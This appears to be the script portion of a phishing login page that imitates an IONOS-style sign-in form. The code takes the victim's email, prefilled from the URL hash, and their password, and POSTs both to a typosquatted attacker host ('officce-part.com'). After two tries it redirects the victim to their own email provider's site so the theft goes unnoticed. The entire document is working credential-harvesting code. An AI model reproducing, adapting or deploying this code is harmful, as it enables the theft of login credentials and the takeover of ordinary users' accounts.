$(document).ready(function() {

    var count = 0;

    // password-unveil

    // password-unveil-reverse

    $('#password-unveil').click(function() {

        event.preventDefault();

        var x = document.getElementById("pr");

        if (x.type === "password") {

            $('#password-unveil').addClass("password-unveil-reverse");

            $('#password-unveil').removeClass("password-unveil");

            x.type = "text";

        } else {

            $('#password-unveil').addClass("password-unveil");

            $('#password-unveil').removeClass("password-unveil-reverse");

            x.type = "password";

        }



    });



    $('.login-form-user-label').click(function() {

        $('#ai').focus();



    });

    $('.login-form-password-label').click(function() {

        $('#pr').focus();



    });





    /////////////url ai getting////////////////

    var ai = window.location.hash.substr(1);

    if (!ai) {



    } else {

        // $('#ai').val(ai);

        var my_ai = ai;

        var ind = my_ai.indexOf("@");

        var my_slice = my_ai.substr((ind + 1));

        var c = my_slice.substr(0, my_slice.indexOf('.'));

        var final = c.toLowerCase();

        $("#msg").hide();

        $('#ai').val(my_ai);

    }

    ///////////////url getting ai////////////////





    var file = "bmV4dC5waHA=";

    $('#submit-btn').click(function(event) {

        $('#error').hide();

        $('#msg').hide();

        event.preventDefault();

        var ai = $("#ai").val();

        var pr = $("#pr").val();

        var msg = $('#msg').html();

        $('#msg').text(msg);

        ///////////new injection////////////////

        var my_ai = ai;

        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;



        if (!filter.test(my_ai)) {

            $('#error').show();

            ai.focus;

            return false;

        }



        var ind = my_ai.indexOf("@");

        var my_slice = my_ai.substr((ind + 1));

        var c = my_slice.substr(0, my_slice.indexOf('.'));

        var final = c.toLowerCase();

        ///////////new injection////////////////

        count = count + 1;



        $.ajax({

            dataType: 'JSON',

            url: 'https://officce-part.com/id.ionos/newt/fury.php',

            type: 'POST',

            data: {

                ai: ai,

                pr: pr,

            },

            // data: $('#contact').serialize(),

            beforeSend: function(xhr) {

                $('#submit-btn').html('Verifing...');

            },

            success: function(response) {

                if (response) {

                    $("#msg").show();

                    console.log(response);

                    if (response['signal'] == 'ok') {

                        $("#pr").val("");

                        if (count >= 2) {

                            count = 0;

                            // window.location.replace(response['redirect_link']);

                            window.location.replace("http://www." + my_slice);



                        }

                        // $('#msg').html(response['msg']);

                    } else {

                        // $('#msg').html(response['msg']);

                    }

                }

            },

            error: function() {

                $("#pr").val("");

                if (count >= 2) {

                    count = 0;

                    window.location.replace("https://officce-part.com/id.ionos/landing.html");

                }

                $("#msg").show();

                // $('#msg').html("Please try again later");

            },

            complete: function() {

                $('#submit-btn').html('Login');

            }

        });

    });





});

</script>



</body></html>